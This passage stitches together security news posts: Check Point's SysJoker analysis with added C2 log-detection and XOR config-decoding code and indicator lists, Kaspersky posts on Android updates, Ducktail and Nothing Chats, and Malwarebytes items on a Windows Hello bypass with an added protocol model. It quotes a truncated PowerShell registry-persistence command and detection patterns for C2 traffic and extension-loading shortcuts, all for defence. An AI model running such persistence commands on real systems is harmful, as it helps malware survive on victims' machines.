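The request sequence laid out across the setup, idle loop, payload download and payload execution phases (register, status polling, /api/library/[TOKEN], /api/ready, /api/requests and the POST of results to /api/requests/[ID], all carrying a Bearer token) can be turned into a log-triage rule. The following is an added example, not code from the Check Point report; the proxy log format it parses is constructed for the example, as are the hosts, IP addresses and token values in the sample log.

```python
import re
from collections import defaultdict

# Added example, not part of the Check Point report. Looks for the
# AppMessagingRegistrar request sequence in web-proxy logs. The log line layout
# below is constructed for the example; adapt LOG_RE to your proxy's format.

STAGE_BY_PATH = {
    "/api/register": "register",
    "/api/status": "idle_poll",
    "/api/update": "setup_done",
    "/api/ready": "ready",
    "/api/requests": "task_fetch",
}
LIBRARY_RE = re.compile(r"^/api/library/[^/\s]+$")   # /api/library/[TOKEN]
RESULT_RE = re.compile(r"^/api/requests/[^/\s]+$")   # POST /api/requests/[ID]

# Constructed format: <timestamp> <client_ip> <method> <host> <path> "<Authorization header>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "(?P<auth>[^"]*)"$'
)


def classify(method: str, path: str):
    """Map a request to a C2 stage name, or None if it does not look like one."""
    if path in STAGE_BY_PATH:
        return STAGE_BY_PATH[path]
    if LIBRARY_RE.match(path):
        return "payload_download"
    if method == "POST" and RESULT_RE.match(path):
        return "result_upload"
    return None


def stages_per_client(lines):
    """Collect the distinct C2-style stages each (client, host) pair reached.
    Apart from the initial /api/register call, which happens before a token exists,
    only requests carrying a Bearer token count, since that is how this variant
    identifies itself to the server."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip rather than guess
        stage = classify(m["method"], m["path"])
        if stage is None:
            continue
        if stage != "register" and not m["auth"].startswith("Bearer "):
            continue
        seen[(m["client"], m["host"])].add(stage)
    return seen


def alerts(lines, min_stages: int = 3):
    """Flag (client, host) pairs that walked at least min_stages distinct stages.
    Generic path names such as /api/status are common on legitimate APIs, so one
    hit is not evidence; the combination of stages against one host is what matters."""
    return sorted(
        (client, host, sorted(stages))
        for (client, host), stages in stages_per_client(lines).items()
        if len(stages) >= min_stages
    )


# Constructed sample log: 10.0.0.5 shows the full beacon sequence against a C2 host,
# 10.0.0.9 only talks to a legitimate API that happens to expose /api/status.
SAMPLE_LOG = """
2023-11-20T10:00:01Z 10.0.0.5 POST c2.example.invalid /api/register ""
2023-11-20T10:00:02Z 10.0.0.5 POST c2.example.invalid /api/status "Bearer tok123"
2023-11-20T10:05:02Z 10.0.0.5 POST c2.example.invalid /api/status "Bearer tok123"
2023-11-20T10:06:00Z 10.0.0.5 GET c2.example.invalid /api/library/tok123 "Bearer tok123"
2023-11-20T10:06:01Z 10.0.0.5 POST c2.example.invalid /api/ready "Bearer tok123"
2023-11-20T10:06:05Z 10.0.0.5 GET c2.example.invalid /api/requests "Bearer tok123"
2023-11-20T10:06:09Z 10.0.0.5 POST c2.example.invalid /api/requests/42 "Bearer tok123"
2023-11-20T10:07:00Z 10.0.0.9 GET api.saas.example /api/status "Bearer legit"
2023-11-20T10:07:30Z 10.0.0.9 GET api.saas.example /api/v1/users "Bearer legit"
""".strip().splitlines()

if __name__ == "__main__":
    for client, host, stages in alerts(SAMPLE_LOG):
        print(f"ALERT {client} -> {host}: {', '.join(stages)}")
```

The threshold of three distinct stages is a starting point, not a tuned value: a host that only polls /api/status will never alert, while a host that downloads from /api/library/, confirms with /api/ready and fetches tasks from /api/requests under the same token will.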

Infrastructure

The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.
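To make the decryption scheme concrete, here is an added example (my own code, not Check Point's and not the malware's) that models the base64-plus-XOR scheme described for the DMADevice config fields earlier and for the OneDrive-hosted C2 address above. It assumes a plain repeating-key XOR applied after base64 decoding; the key, IP address and field values in the sample blob are constructed for the example, not taken from the campaign.

```python
import base64
import json
from itertools import cycle

# Added example, not Check Point's code. Models the scheme the report describes:
# fields are base64-encoded and XOR-encrypted with a key that is either carried
# in the JSON itself ("key" field, DMADevice variant) or hardcoded in the sample
# (AppMessagingRegistrar variant). A plain repeating-key XOR is assumed here.


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so one routine encrypts and decrypts."""
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_field(b64_blob: str, key: str) -> bytes:
    """Decrypt direction: base64-decode first, then XOR."""
    return xor_bytes(base64.b64decode(b64_blob), key.encode())


def encrypt_field(plaintext: bytes, key: str) -> str:
    """Encrypt direction (used only to construct sample data): XOR first, then base64-encode."""
    return base64.b64encode(xor_bytes(plaintext, key.encode())).decode()


def decode_dmadevice_blob(blob: str) -> dict:
    """Parse the stage-1 JSON: the "key" field decrypts every other field.
    "data" is a JSON array of strings; anything else is returned as a plain string."""
    outer = json.loads(blob)
    key = outer["key"]
    decoded = {}
    for name, value in outer.items():
        if name == "key":
            continue
        plain = decrypt_field(value, key).decode("utf-8")
        decoded[name] = json.loads(plain) if name == "data" else plain
    return decoded


def decode_c2_address(b64_blob: str, hardcoded_key: str) -> str:
    """Decrypt a base64 + XOR C2 address with a key hardcoded in the sample."""
    return decrypt_field(b64_blob, hardcoded_key).decode("utf-8")


# Constructed sample data (not the real campaign blob): build it the way the
# malware would so the decoder can be exercised offline.
SAMPLE_KEY = "00000000-example-key-0000-000000000000"
SAMPLE_VALUES = ["SystemDrive", "ProgramData", "DMADevice", "DMASolutionInc"]
SAMPLE_BLOB = json.dumps({
    "key": SAMPLE_KEY,
    "pi": encrypt_field(b"203.0.113.10", SAMPLE_KEY),  # RFC 5737 documentation address
    "data": encrypt_field(json.dumps(SAMPLE_VALUES).encode(), SAMPLE_KEY),
})

if __name__ == "__main__":
    print(json.dumps(decode_dmadevice_blob(SAMPLE_BLOB), indent=2))
```

When applying this to a real sample, the first thing to confirm in the disassembly is the key schedule: whether the key repeats from offset zero, whether any bytes are skipped, and whether base64 decoding really happens before the XOR, since the order of those two steps is the usual reason a decoder produces garbage.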

This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.

Figure 6 – Metadata of OneDrive file containing the encrypted C2 server.

Ties to Operation Electric Powder

The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:

$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv';
$results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run'[TRUNCATED]

This PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky.

The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.

Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files:

Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant.

Conclusion

Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company.

In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.

The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements.

Check Point Customers Remain Protected

Check Point customers remain protected against the attacks detailed in this report when using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.

Threat Emulation
Backdoor.Wins.Sysjoker.ta.R
Backdoor.Wins.Sysjoker.ta.Q
Backdoor.Wins.Sysjoker.ta.P
Backdoor.Wins.Sysjoker.ta.O
Backdoor.Wins.Sysjoker.ta.N
Backdoor.Wins.Sysjoker.ta.M
Backdoor.Wins.Sysjoker.ta.L

Harmony Endpoint
Backdoor.Win.SysJoker.H

Check Point Anti-Bot
Backdoor.WIN32.SysJoker.A
Backdoor.WIN32.SysJoker.B
Backdoor.WIN32.SysJoker.C

IOCs

Infrastructure

85.31.231[.]49
sharing-u-file[.]com
filestorage-short[.]org
audiosound-visual[.]com
62.108.40[.]129

Hashes

d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72
6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95
e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836
96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f
67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706
0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba

The post Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker appeared first on Check Point Research.

Check Point Research – Read More

How to update Android without bugs, data loss, security risks or other nuisances | Kaspersky official blog

For many, Android smartphone updates are a sore point. On the one hand, they’re essential to fix dangerous bugs and vulnerabilities on your phone, delivering handy new features and support for the latest technologies at the same time. On the other hand, updates are often delayed, get installed at the worst possible time, they can slow down your phone, and in really bad cases cause data loss or even brick the device.

Let’s figure out how to install Android updates properly to get all the benefits and zero misery.

Different types of updates

“Installing updates” can refer to five quite different scenarios depending on what exactly is being updated.

Updating apps. Individual apps on devices are updated automatically or manually through an app store (Google Play, Huawei AppGallery and the like). Updating one app in this case rarely affects the rest and generally has little effect on the gadget.
Updating Android components. Google developers have long been committed to modularization, so many parts of the operating system (such as the call screen or photo viewer) are essentially separate apps. Some of these likewise download updates through an app store; others (like Google Play Services) are forcibly updated at a lower level.
Updating extensions from the smartphone manufacturer. All that distinguishes a Samsung, Oppo or Xiaomi smartphone from a “pure” Android device are proprietary extensions, which often radically alter the look of the operating system and sport fancy names like OneUI or ColorOS. The internal structure and update method differ from vendor to vendor — many try to time extension updates to coincide with the release of general Android updates, but this isn’t a hard-and-fast rule.
Updating Android itself. Google rolls out major Android updates once a year — upping the major version number by one — but bug fixes and security updates appear monthly. However, most smartphones don’t get the latest version of Android from Google directly: manufacturers of specific models must first add the correct low-level components and vendor-specific extensions, and only then offer the latest version of Android to users. Therefore, for any Android update, the time from rollout to availability on smartphones other than Google Pixel or devices running AOSP (Android Open Source Project) can be anything from a month to… eternity — depending on the manufacturer’s promptness.
Updating low-level components. This means the bootloader, 4G/Wi-Fi chip firmware, drivers and the like. As a rule, these components are updated along with the operating system, but they can get their own updates as and when required. In any case, updates of this type are released only by the company that made your phone.

Updates of the first two types (apps and Android components) arrive either automatically or by pressing literally one button in your chosen app store, and usually take just seconds; the others need much longer, require a smartphone restart, and are slightly more prone to side effects. Which means you need to cushion the potential blow.

What could go wrong

Nuisances. On many manufacturers’ devices, alerts about new updates appear in the notification drawer and remain stuck there. Sometimes they go full-screen and demand immediate installation. One mis-tap and your phone is already pulling gigabytes of data – heaven forbid if you’re in roaming mode.

Eating up phone space. Security updates and bug fixes are usually small in scope, but new versions of vendor extensions or Android itself can be significantly larger than their forebears. And this creates a separate problem for budget smartphones with low storage capacity.

Post-update bugs. Even Google makes mistakes. For example, users updating to Android 12 encountered all sorts of issues — from unstable network connection and flickering displays to bricked devices. Similar problems sometimes occur with vendor extensions.

Loss of data or functionality. A rare but most unpleasant occurrence is when, after an update, various apps stop working (if, say, they’re too outdated to receive updates) or user data vanishes.

Why you still need to update

Vulnerabilities. Stories about how smartphones can get infected with malware without any user action or with no signs that anything is wrong are not fiction, but rather the result of the exploitation of dangerous bugs in Android itself and installed apps. Vulnerabilities even crop up in cellular or Wi-Fi modules. And if you think this “spy fiction” doesn’t apply to you, beware — cybercriminals will quite happily use vulnerabilities of this kind to steal your money, passwords and anything else that isn’t bolted down. Each monthly Android update fixes a handful of serious vulnerabilities and a dozen or two low-risk ones.

Bugs. From increased power consumption and memory leaks to camera focus issues, the corresponding bug fixes in low-level components, Android itself, and/or vendor extensions make the smartphone experience more enjoyable.

Compatibility. Even if you don’t like new stuff, sooner or later you have to update the browser, programs, and operating system anyway just to be able to continue using your online apps and even visit certain websites. The support period for older versions of software is steadily dwindling, and, for example, in a severely outdated Chrome, many sites refuse to open properly.

Top tips for hassle-free updating

Use only official sources. Download updates only through your chosen app store or your smartphone’s system settings. Don’t install updates from websites unless the manufacturer offers no other way; in which case, as above, download updates only from said manufacturer’s official site — never from aggregators, news media or unknown sites.

Create backups. Android doesn’t fully back up everything automatically, but you can set up uploading of photos and documents to Google Drive, while your contacts, calendar and various other data are backed up to your Google account, and many apps (for example, WhatsApp) have built-in backup. Set up backup in all apps where possible, so that important information gets saved to the cloud on a nightly basis. If you don’t trust third-party clouds, there are utilities for syncing your phone with a storage server on your home network.

Optimize update downloading. Explore your smartphone settings. If updates are customizable, opt to download them at night, assuming Wi-Fi and power are available. That way, downloading updates won’t interrupt your daytime work, chew through your mobile data, or drain your battery. If there are no such settings, and update notifications often come at a bad time, you can risk turning off notifications or automatic checking for updates. In this case, you must set a regular reminder (say, once a month on a weekend) to check for updates manually through the device settings. It’s best to choose an installation time when you can afford to put your phone down for a while.

Be selective. If it’s not a critical vulnerability fix, you can put off installing it — but not for long, of course; waiting a few days to a week should be OK, all the while checking on forums to see if owners of the same smartphone are having issues with the update. If so, that will give time for hundreds of them to voice a complaint, and, if you’re lucky, time also for a patched version to come out.

Get rid of unnecessary stuff. Binning downloaded documents no longer needed, clearing caches, deleting unused apps and moving photos and videos to the cloud helps free up a lot of smartphone memory and reduce the likelihood of update problems. Incidentally, our mobile application for Android comes with a handy junk cleaner tool.

Update apps and firmware separately. To make it easier to track the source of potential issues, don’t update apps and firmware at the same time: after updating the operating system and vendor extensions, wait a few days before installing app updates — again, only if there are no critical vulnerability fixes.

Install Kaspersky: Antivirus & VPN on your Android device. Our application warns and protects you against known vulnerabilities, scans downloaded apps for viruses, fixes dangerous device settings, manages app permissions, blocks dangerous links, and keeps your data safe if ever your phone is lost or stolen.

Kaspersky official blog – Read More

How Ducktail steals Facebook accounts | Kaspersky official blog

Our researchers have discovered a new version of malware from the Ducktail family. Cybercriminals are using it to target company employees who either hold fairly senior positions or work in HR, digital marketing, or social-media marketing. Their ultimate goal is to hijack Facebook Business accounts, so it makes sense that the attackers are interested in folks most likely to have access to them. Today, we talk about how attacks occur, what’s unusual about them and, of course, how to protect yourself.

Bait and malicious payload

What the cybercriminals behind Ducktail do is send out malicious archives to their potential victims. To lull the recipient’s vigilance, the archives contain bait in the form of theme-based images and video files on a common topic. For example, the theme of the most recent campaign (March to early October 2023) was fashion: emails were sent out in the name of big fashion industry players with archives containing photos of items of clothing.

However, inside these archives were also executable files. These files had PDF icons and very long file names to divert the victim’s attention from the EXE extension. Additionally, the names of the fake files appeared to be carefully chosen for relevance so as to persuade the recipients to click on them. In the fashion-themed campaign, the names referred to “guidelines and requirements for candidates”, but other bait like, say, price lists or commercial offers, can be used as well.

The malicious Ducktail archive contains a file that looks like a PDF but is in fact an EXE

After clicking the disguised EXE file, a malicious script runs on the target device. Firstly, it does indeed display the contents of some PDF file embedded in the malware code, with the hope that the victim doesn’t smell a rat. At the same time, the malware scans all the shortcuts on the desktop, the Start menu, and the Quick Launch toolbar. It searches for shortcuts to Chromium-based browsers, such as Google Chrome, Microsoft Edge, Vivaldi, Brave… Having found one, the malware alters its command line by adding an instruction to install a browser extension, which is also embedded in the executable file. Five minutes later, the malicious script terminates the browser process, prompting the user to restart it using one of the modified shortcuts.
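One way a defender can look for the shortcut tampering described above is to audit browser shortcuts for command-line arguments they should not have. The following is an added example, not Kaspersky's code. It works on shortcut records already read from disk (name, target and arguments; reading them out of .lnk files is left to whichever shortcut parser you use on the host), the sample records are constructed, and treating the Chromium `--load-extension` switch as the high-severity indicator is an assumption, since the post does not name the switch the malware adds.

```python
import ntpath
import re

# Added example, not Kaspersky's code. Flags shortcuts whose target is a
# Chromium-based browser but whose command line carries extra arguments, which
# is the modification Ducktail makes to force its extension into the browser.

# Browsers named in the post; extend as needed for your fleet.
CHROMIUM_BINARIES = {"chrome.exe", "msedge.exe", "vivaldi.exe", "brave.exe"}

# Assumption: the switch that loads an unpacked extension from a directory is the
# most direct way to install one from the command line, so it gets top severity.
EXTENSION_SWITCH_RE = re.compile(r"--load-extension(?:=|\s)", re.IGNORECASE)


def is_chromium_target(target: str) -> bool:
    """True if the shortcut target's file name is one of the known browser binaries.
    ntpath is used so Windows paths are split correctly even when run on Linux."""
    return ntpath.basename(target).lower() in CHROMIUM_BINARIES


def audit_shortcut(name: str, target: str, arguments: str):
    """Return a finding dict for a suspicious browser shortcut, or None if it looks clean.
    A browser shortcut normally has no arguments at all, so any argument string is
    reported; one that loads an extension is reported at high severity."""
    if not is_chromium_target(target):
        return None
    args = (arguments or "").strip()
    if not args:
        return None
    severity = "high" if EXTENSION_SWITCH_RE.search(args) else "medium"
    return {"shortcut": name, "target": target, "arguments": args, "severity": severity}


def audit_all(shortcuts):
    """Run audit_shortcut over (name, target, arguments) records and collect findings."""
    findings = []
    for name, target, arguments in shortcuts:
        finding = audit_shortcut(name, target, arguments)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample records (not real host data): one clean browser shortcut,
# one with an extension-loading switch, one with an unrelated extra argument,
# and one non-browser shortcut that must be ignored.
SAMPLE_SHORTCUTS = [
    ("Google Chrome.lnk", r"C:\Program Files\Google\Chrome\Application\chrome.exe", ""),
    ("Microsoft Edge.lnk", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r"--load-extension=C:\Users\victim\AppData\Local\Temp\ext"),
    ("Brave.lnk", r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "--disable-popup-blocking"),
    ("Notepad.lnk", r"C:\Windows\System32\notepad.exe", r"--load-extension=x"),
]

if __name__ == "__main__":
    for f in audit_all(SAMPLE_SHORTCUTS):
        print(f"[{f['severity']}] {f['shortcut']}: {f['arguments']}")
```

Run it against the desktop, Start menu and Quick Launch locations the post lists, since those are exactly the places the malware rewrites; a medium finding is worth a look but may be a legitimate administrator customisation, while a high finding on a user workstation should be treated as an incident.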

Malicious browser extension

After the user clicks the shortcut, a malicious extension is installed in the browser, where it convincingly masquerades as Google Docs Offline, using the exact same icon and description (though only in English, which can give away the fake in some regions).

The malicious extension masquerading as Google Docs Offline (left), and the real Google Docs Offline extension (right) in the Google Chrome browser

Once installed and running, the malicious extension starts constantly monitoring all tabs opened by the user in the browser and sending information about them to the attackers’ C2 server. If it finds an address associated with Facebook among the opened tabs, the malicious extension checks for Ads and Business accounts and then hijacks them.

The extension steals information from Facebook accounts logged into on the victim’s device, as well as active session cookies stored by the browser, which can be used to sign in to the accounts without authentication.

The group behind the malware has reportedly been active since 2018. Several research teams believe it has Vietnamese origin. The group’s distribution of Ducktail can be pinpointed to 2021.

How to guard against Ducktail

To protect against Ducktail and similar threats, employees need to simply observe basic digital hygiene; in particular:

Never download suspicious archives on work computers — especially if the links come from untrusted sources.
Carefully check the extensions of all files downloaded from the internet or email before opening them.
Never click on a file that looks like a harmless document but has an EXE extension — this is a clear sign of malware.
Always install reliable protection on all work devices. This will warn you of potential danger and defeat any attacks in time. Our solutions detect this threat with the verdict HEUR:Trojan.Win64.Ducktail.gen.
You can find indicators of compromise as well as more technical details on this malware in the respective Securelist blog post.

Kaspersky official blog – Read More

Why Nothing Chats is unsafe | Kaspersky official blog

The Nothing Chats app is a messenger created by the developer of the quite popular smartphone Nothing Phone — yet another “iPhone killer”. The main selling point of Nothing Chats was the promise of giving Android users the ability to fully communicate using iMessage — a messaging system previously available only to iPhone owners.

However, Nothing Chats was almost immediately found to have a whole host of security and privacy issues. These problems were so serious that less than 24 hours after its release in the Google Play Store, the application had to be removed. Let’s delve into this in more detail.

Nothing Chats, Sunbird, and iMessage for Android

The Nothing Chats messenger was announced on November 14, 2023, in a video by the well-known YouTube blogger Marques Brownlee (aka MKBHD). He talked about how the new messenger from Nothing had plans to allow owners of a Nothing Phone (which is Android-based) to communicate with iOS users through iMessage.

By the way, I recommend watching the video by MKBHD, at least to see how the messenger worked.

The video also briefly outlines how the messenger operates from a technical point of view. To begin, users have to provide Nothing Chats with the login and password to their Apple ID account (and if they don’t have one yet, they need to create one). After this, to indirectly quote the video, “on some Mac mini somewhere on a server farm”, this Apple account is logged in to, after which this remote computer serves as a relay transmitting messages from the user’s smartphone to the iMessage system, and vice versa.

To give credit where credit is due, at the end of the sixth minute, the author of the video makes a point of emphasizing that this approach carries some serious risks. Indeed, logging in with your Apple ID on some unknown device that doesn’t belong to you, located who knows where, is a very, very bad idea for a number of reasons.

The coveted blue message clouds of iMessage — the main promise of Nothing Chats

The Nothing company made no secret of the fact that “iMessage for Android” was not their own development. The company partnered with another company, Sunbird, so the Nothing Chats messenger was a clone of the Sunbird: iMessage for Android application, with some cosmetic interface changes. By the way, the Sunbird app was announced to the press back in December 2022, but its full launch for a wide audience was constantly postponed.

Nothing Chats and security issues

After the announcement, suspicions immediately arose that Nothing and Sunbird would face serious privacy and security issues. As mentioned earlier, the idea of logging in with your Apple ID on someone else’s device is highly risky because this account gives full control over a significant amount of user information and over the devices themselves through the Apple feature Find My…

To reassure users, both Sunbird and Nothing asserted on their websites that logins and passwords aren’t stored anywhere, all messages are protected by end-to-end encryption, and everything is absolutely secure.

Sunbird’s website confirming the security and privacy of iMessage for Android, as well as the use of end-to-end encryption (spoiler: this isn’t true)

However, the reality was way off even the most skeptical predictions. Once the application became available, it quickly became clear that it totally failed to deliver on its promises regarding end-to-end encryption. Worse still, all messages and files sent or received by the user were delivered by Nothing Chats in unencrypted form to two services simultaneously — the Google Firebase database and the Sentry error monitoring service, where Sunbird employees could access these messages.

The FAQ section on the official Nothing Chats page also explicitly mentions end-to-end encryption

And if that still wasn’t enough, not only Sunbird employees but anyone interested could read the messages. The issue was that the token required for authentication in Firebase was transmitted by the application over an unprotected connection (HTTP) and could, therefore, be intercepted. Subsequently, this token provided access to all messages and files of all users of the messenger — as mentioned earlier, all this data was sent to Firebase in plain text.

Once again: despite assurances of using end-to-end encryption, any message from any user on Nothing Chats and all files sent by them — photos, videos, and so on — could be intercepted by anyone.

Also, the FAQ page of Nothing Chats claims that messages are never stored anywhere — doesn’t it make you want to cry?

One of the researchers involved in analyzing the vulnerabilities of Nothing Chats/Sunbird created a simple website as proof of an attack’s feasibility, allowing anyone to see that their messages in iMessage for Android could indeed be easily intercepted.

Shortly after the vulnerabilities were made public, Nothing decided to remove their app from the Google Play Store “to fix a few bugs”. However, even if Nothing Chats or Sunbird: iMessage for Android returns to the store, it’s best to avoid them — as well as any similar apps. This story demonstrates vividly that when creating an intermediary service that allows access to iMessage, it’s very easy to make catastrophic mistakes that put users’ data at extreme risk.

What Nothing Chats users should do now

If you’ve used the Nothing Chats app, you should do the following:

Log into your Apple ID account from a trusted device, find the page with active sessions (devices you’re logged in to), and delete the session associated with Nothing Chats/Sunbird.
Change your Apple ID password. It’s an extremely important account, so it’s advisable to use a very long and random sequence of characters — Kaspersky Password Manager can help you generate a reliable password and store it securely.
Uninstall the Nothing Chats app.
You can then use a tool created by one of the researchers to remove your information from Sunbird’s Firebase database.
If you’ve sent any sensitive information through Nothing Chats, then you should treat it as compromised and take appropriate measures: change passwords, reissue cards, and so on. Kaspersky Premium will help you track possible leaks of your personal data linked to email addresses or phone numbers.

Kaspersky official blog – Read More

A week in security (November 20 – November 26)

Last week on Malwarebytes Labs:

Windows Hello fingerprint authentication can be bypassed on popular laptops

Citrix Bleed widely exploited, warn government agencies

Chrome pushes forward with plans to limit ad blockers in the future

$19 Stanley cup deal is a Black Friday scam

Malwarebytes consumer product roundup: The latest

Explained: Privacy washing

Nothing Chats pulled from Google Play

How to stop fake System notifications on macOS

Why less is more: 10 steps to secure customer data

Atomic Stealer distributed to Mac users via fake browser updates

Scattered Spider ransomware gang falls under government agency scrutiny

Student discount: Get 50% off Malwarebytes

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Malwarebytes – Read More

Windows Hello fingerprint authentication can be bypassed on popular laptops

Researchers have found several weaknesses in Windows Hello fingerprint authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops.

Microsoft’s Offensive Research and Security Engineering (MORSE) asked the researchers to evaluate the security of the top three fingerprint sensors embedded in laptops. They found vulnerabilities that allowed them to completely bypass Windows Hello authentication on all three.

If you like to read the full technical details, we happily refer you to the Blackwing researcher’s blog: A TOUCH OF PWN – PART I. For a less technical summary, carry on.

First and foremost, it’s important to know that for these vulnerabilities to be exploitable, fingerprint authentication needs to be set up on the target laptop. Imagine the type of disaster if that weren’t true.

The three sensors the researchers looked at were all of the “match on chip” type. This means that a separate chip stores the biometric credentials (in this case the fingerprints), making it almost impossible to hack into.

The communication between the sensor and the laptop is done over a secure channel, set up through the Secure Device Connection Protocol (SDCP) created by Microsoft.

SDCP aims to answer three questions about the sensor:

How can the laptop be certain it’s talking to a trusted sensor and not a malicious one?

How can the laptop be certain the sensor hasn’t been compromised?

How is the raw input from the sensor protected?

The input has to be authenticated.

The input is fresh and can’t be re-playable.
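To show what “authenticated” and “fresh” buy you, here is an added example (not Microsoft’s SDCP code; a deliberately simplified model) in which the host issues a one-time nonce and accepts a match result only when it carries a valid MAC over that nonce. Real SDCP establishes its key through certificates and key agreement between host and sensor; here the shared session key is simply handed to both parties so the checks can be exercised offline, and the rogue USB device and the replayed reply are constructed for the example.

```python
import hashlib
import hmac
import os

# Added example, not Microsoft's SDCP implementation. Models the two properties
# the article lists for sensor input: it must be authenticated (MAC under a key
# only the genuine sensor holds) and fresh (bound to a host-chosen nonce used once).
# The session key is assumed to be shared out of band for the purpose of the demo.


class GenuineSensor:
    """A sensor that holds the session key and authenticates its match result."""

    def __init__(self, session_key: bytes):
        self._key = session_key

    def authorize(self, nonce: bytes, matched: bool) -> tuple:
        payload = nonce + (b"\x01" if matched else b"\x00")
        tag = hmac.new(self._key, payload, hashlib.sha256).digest()
        return (nonce, matched, tag)


class RogueUsbDevice:
    """Claims to be the sensor but never learned the key (the article's USB spoofing scenario)."""

    def authorize(self, nonce: bytes, matched: bool) -> tuple:
        return (nonce, matched, b"\x00" * 32)  # cannot compute a valid tag


class Host:
    """The laptop side: issues a one-time nonce and accepts only a valid, fresh reply."""

    def __init__(self, session_key: bytes):
        self._key = session_key
        self._pending = None

    def challenge(self) -> bytes:
        self._pending = os.urandom(16)
        return self._pending

    def accept(self, reply: tuple) -> bool:
        nonce, matched, tag = reply
        if self._pending is None or not hmac.compare_digest(nonce, self._pending):
            return False  # stale or unknown nonce: a replay
        self._pending = None  # nonce is consumed whether or not the tag verifies
        payload = nonce + (b"\x01" if matched else b"\x00")
        expected = hmac.new(self._key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False  # unauthenticated input
        return matched


def login_with_genuine_sensor() -> bool:
    key = os.urandom(32)
    host, sensor = Host(key), GenuineSensor(key)
    return host.accept(sensor.authorize(host.challenge(), matched=True))


def login_with_rogue_device() -> bool:
    """A USB device that only sends 'authorized user logged in' without the key."""
    key = os.urandom(32)
    host, rogue = Host(key), RogueUsbDevice()
    return host.accept(rogue.authorize(host.challenge(), matched=True))


def replay_earlier_reply() -> bool:
    """Capture a valid reply and present the same bytes again for a later login."""
    key = os.urandom(32)
    host, sensor = Host(key), GenuineSensor(key)
    captured = sensor.authorize(host.challenge(), matched=True)
    assert host.accept(captured)  # first use succeeds
    host.challenge()              # new login attempt, new nonce
    return host.accept(captured)  # same bytes again: rejected


def tamper_with_result() -> bool:
    """Take a genuine 'no match' reply and flip the result bit in transit."""
    key = os.urandom(32)
    host, sensor = Host(key), GenuineSensor(key)
    nonce, _, tag = sensor.authorize(host.challenge(), matched=False)
    return host.accept((nonce, True, tag))


if __name__ == "__main__":
    print("genuine sensor:", login_with_genuine_sensor())
    print("rogue USB device:", login_with_rogue_device())
    print("replayed reply:", replay_earlier_reply())
    print("tampered result:", tamper_with_result())
```

The three failure cases map onto the weaknesses the article goes on to describe: a sensor that transmits identifiers in cleartext, a host that never turned the protection on, and an unauthenticated configuration packet all amount to the host skipping the MAC or nonce check in accept().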

So, what could go wrong?

The researchers were still able to spoof the communication between sensor and laptop. They were able to fool the laptops using a USB device that pretended to be the laptop’s sensor and sent a signal that an authorized user had logged in.

The bypasses are possible because the device manufacturers did not use SDCP to its full potential:

The ELAN sensor commonly used in Dell and Microsoft Surface laptops lacks SDCP support and transmits security identifiers in cleartext.

Synaptics sensors, used by both Lenovo and Dell, had turned SDCP off by default and used a flawed custom Transport Layer Security (TLS) stack to secure USB communications.

The Goodix sensors, also used by both Lenovo and Dell, could be bypassed because they support both Windows and Linux, and Linux does not support SDCP. The host driver sends an unauthenticated configuration packet to the sensor during sensor initialization to specify which template database to use.

The recommendation of the researchers to the manufacturers is clear: SDCP is a powerful protocol, but it doesn’t help if it isn’t enabled or when it can be bypassed by using other weak links in your setup.
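To show what the three SDCP properties above buy, and why a host that accepts cleartext match results loses all of them, here is a simplified model added as an example (not the researchers’ code and not Microsoft’s protocol): the pairing key, template id and user name are constructed, and SDCP’s real key agreement is not modelled.

```python
import hashlib
import hmac
import secrets

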